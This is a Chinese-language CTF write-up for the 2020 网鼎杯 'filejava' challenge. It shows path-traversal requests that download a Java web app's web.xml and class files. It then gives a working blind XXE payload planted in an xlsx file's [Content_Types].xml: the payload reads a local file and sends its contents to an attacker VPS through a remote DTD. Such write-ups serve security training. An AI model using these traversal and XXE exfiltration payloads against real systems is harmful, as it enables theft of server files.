[网鼎杯-2020-青龙组]filejava题解

  1. 1. 文件读取
  2. 2. Excel xxe
  3. 3. Reference

文件读取

有一个文件下载的接口

image-20210321182212910

然后测试读取文件.

image-20210321182225584

web目录下的树状图

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
E:\CODE\JAVA\JAVAWEB\FIRSTWEB\WEB
│ checkbox.jsp
│ hello.jsp
│ index.jsp
│ message.jsp
│ upload.jsp

└─WEB-INF
│ web.xml

├─classes
│ CheckBox.class
│ DatabaseAccess.class
│ ErrorHandler.class
│ HelloForm.class
│ HelloWorld.class
│ LogFilter.class
│ UploadServlet.class

└─lib
commons-fileupload-1.3.2.jar
commons-io-2.5.jar

web.xml: ../../../../WEB-INF/web.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<servlet>
<servlet-name>DownloadServlet</servlet-name>
<servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>DownloadServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>

<servlet>
<servlet-name>ListFileServlet</servlet-name>
<servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>ListFileServlet</servlet-name>
<url-pattern>/ListFileServlet</url-pattern>
</servlet-mapping>

<servlet>
<servlet-name>UploadServlet</servlet-name>
<servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>UploadServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
</web-app>

然后读一些class文件,反编译得到源码(拖到IDEA)进行代码审计

1
2
3
?filename=../../../../WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
?filename=../../../../WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
?filename=../../../../WEB-INF/classes/cn/abc/servlet/UploadServlet.class

Excel xxe

在UploadServlet.java,发现下面代码可以解析excel文件,尝试Excel XXE盲注

1
2
3
4
5
6
7
8
9
10
11
12
// ...
if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
try {
Workbook wb1 = WorkbookFactory.create(in);
Sheet sheet = wb1.getSheetAt(0);
System.out.println(sheet.getFirstRowNum());
} catch (InvalidFormatException var20) {
System.err.println("poi-ooxml-3.10 has something wrong");
var20.printStackTrace();
}
}
/ ...

unzip .\Excel-1.xlsx解压开正常的excel文件.修改[Content_Types].xml DTD部分 ,然后重新打包

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % remote SYSTEM "http://vps:2122/1.dtd">
%remote;
%all;
]>
<root>&send;</root>

1.dtd:

1
<!ENTITY % all "<!ENTITY send SYSTEM 'http://vps:2122/%file;'>">

dtd文件只加载不解析,所以必须用上面这种格式的payload

python开启web服务然后监听即可

image-20210321182242907

Reference

https://xz.aliyun.com/t/7747

https://xz.aliyun.com/t/3741